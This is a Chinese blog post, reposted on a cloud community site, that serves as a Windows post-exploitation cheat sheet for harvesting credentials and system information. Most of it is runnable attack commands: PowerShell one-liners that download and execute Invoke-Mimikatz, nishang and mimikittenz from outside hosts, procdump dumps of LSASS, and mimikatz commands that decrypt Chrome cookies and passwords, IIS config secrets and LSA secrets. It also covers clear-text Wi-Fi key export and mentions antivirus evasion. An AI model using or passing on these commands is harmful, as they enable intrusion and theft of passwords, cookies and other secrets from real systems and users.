前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >后渗透攻防的信息收集

后渗透攻防的信息收集

作者头像
逸鹏
发布2018-04-11 09:38:27
1.9K0
发布2018-04-11 09:38:27
举报
文章被收录于专栏:逸鹏说道逸鹏说道

1.0前言

后渗透常见的信息收集思路

延伸:

  • 渗透测试中的技巧
  • 后渗透阶段的攻防对抗
  • linux入侵后续指南
  • mimikittenz:又一款Windows密码获取工具

1.1系统管理员密码

A.常用来获取windows密码的工具

1.mimikatz 2.wce 3.getpass 4.QuarksPwDump 5.reg-sam 6.pwdump7 7.procdump.exe +mimikatz …….

B.免杀抓取密码的两种方式

1

1.powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

tips:powershell 默认windows visa后才有

2. procdump lsass 进程导出技巧

12

C:\temp\procdump.exe-accepteula-malsass.exelsass.dmp//For 32 bitsC:\temp\procdump.exe-accepteula-64-malsass.exelsass.dmp//For 64 bits

然后本地使用mimikatz 还原密码

1.2 其他用户session、3389和ipc连接记录、各用户回收站信息收集

C.windows本地的信息收集、回收站的信息获取

cmdkey /list 查看3389可信任链接 使用netpass.exe 即可知道密码

net use 查看到已建立连接记录。也是直接可以用wmic at sc 等直接执行命令的

其中$I开头的文件保存的是路径信息,$R保存的是文件

1.3 浏览器密码和浏览器cookies的获取 ie chrome firefox 等

D1.chrome为例 的密码和cookies获取

12345678910

%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 %localappdata%\google\chrome\USERDA~1\default\USERDA~1 %localappdata%\google\chrome\USERDA~1\default\cookies chrome的用户信息保存在本地文件为sqlite 数据库格式

D2.mimikatz+WebBrowserPassView.exe获取浏览器的密码和cookie信息

123456

mimikatz读取chromecookiesmimikatz.exeprivilege::debuglog"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect"exit mimikatz.exeprivilege::debuglog"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1"exit mimikatz.exeprivilege::debuglog"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1"exit//读chrome密码

1.4 windows无线密码获取。数据库密码获取

E.windows wifi密码的获取

netsh wlan show profiles 列出链接过的wifi

netsh wlan export profile interface=无线网络连接 key=clear folder=C:\ 读取指定无线网络的连接密码,以明文方式显示

1.5 host文件获取和dns缓存信息收集 等等

F.windows hosts/iis config

C:\Windows\System32\drivers\etc\hosts

windows7 windows2008等

C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS

windows2003位置

提权情况下或者过了uac的情况下直接type一下就行了

iis-web路径

12345

iis6 =========>cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/rootiis7 ,8 =======>appcmd.exe%systemroot%/system32/inetsrv/appcmd.exe list site ——列出网站列表 %systemroot%\system32\inetsrv\appcmd.exe list vdir ——列出网站物理路径

当然你也可以用mimikatz

12

mimiktaz读取iis7配置文件密码mimikatz.exeprivilege::debuglog"iis::apphost /in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live"exit

1.6 杀软 补丁 进程 网络代理信息wpad信息。软件列表信息

G.ie浏览器的代理信息查看(网络代理信息wpad信息)

1

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

1.7 计划任务 账号密码策略与锁定策略 共享文件夹 web服务器配置文件

H.windows log view

1.Windows2003下默认存在eventquery.vbs

1

cscriptc:\WINDOWS\system32\eventquery.vbs/fi"Datetime eq 06/24/2015,01:00:00AM-06/24/2015,10:00:00AM"/lSecurity/V#查看SECURITY日志 2015-6.24 上午1点-上午10点日志

windows 7以上wevtutil 命令

2.查询所有登录、注销相关的日志语法

3.第三方信息收集工具LogParser.exe psloglist.exe等

1.8 V**历史密码等 teamview密码等 启动项 iislog 等等

I.V**密码获取为例

1

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

其他工具如Dialupass.exe

感兴趣可以看看mimikatz dpapi模块的使用。很强大 sam 密码 ipc连接密码

1.9 常用的后渗透信息收集工具。powershell+passrec的使用

J1.passrec intro

include:

vnc mail V** router ie firefox chrome

J2.powshell intro

FTP访问、共享连接、putty连接 驱动、应用程序、hosts 文件、进程、无线网络记录

12

powershell"IEX (New-Object Net.WebClient).DownloadString('https://github.com/samratashok/nishang/tree/master/Gather/Gather/Get-Information.ps1'); Get-Information"

正则过滤进程密码,已测windows7

1

powershellIEX(New-ObjectSystem.Net.Webclient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1');Invoke-mimikittenz

sqlserver密码获取工具Get-MSSQLCredentialPasswords.psm1 //未测

结语

抛砖引玉!!!!!欢迎交流

下期:windows自带的后门维持工具

bitsadmin schtasks at wimc+mof等应用

tips:已360为例,绕过技巧

链接: http://pan.baidu.com/s/1o8NFSaI 密码: ypd8

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2016-08-31,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 我为Net狂 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1.0前言
  • 1.1系统管理员密码
    • A.常用来获取windows密码的工具
      • B.免杀抓取密码的两种方式
      • 1.2 其他用户session、3389和ipc连接记录、各用户回收站信息收集
      • 1.3 浏览器密码和浏览器cookies的获取 ie chrome firefox 等
        • D1.chrome为例 的密码和cookies获取
          • D2.mimikatz+WebBrowserPassView.exe获取浏览器的密码和cookie信息
          • 1.4 windows无线密码获取。数据库密码获取
            • E.windows wifi密码的获取
            • 1.5 host文件获取和dns缓存信息收集 等等
              • F.windows hosts/iis config
              • 1.6 杀软 补丁 进程 网络代理信息wpad信息。软件列表信息
                • G.ie浏览器的代理信息查看(网络代理信息wpad信息)
                • 1.7 计划任务 账号密码策略与锁定策略 共享文件夹 web服务器配置文件
                  • H.windows log view
                  • 1.8 V**历史密码等 teamview密码等 启动项 iislog 等等
                    • I.V**密码获取为例
                    • 1.9 常用的后渗透信息收集工具。powershell+passrec的使用
                      • J1.passrec intro
                        • J2.powshell intro
                        • 结语
                        相关产品与服务
                        网站渗透测试
                        网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
                        领券
                        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档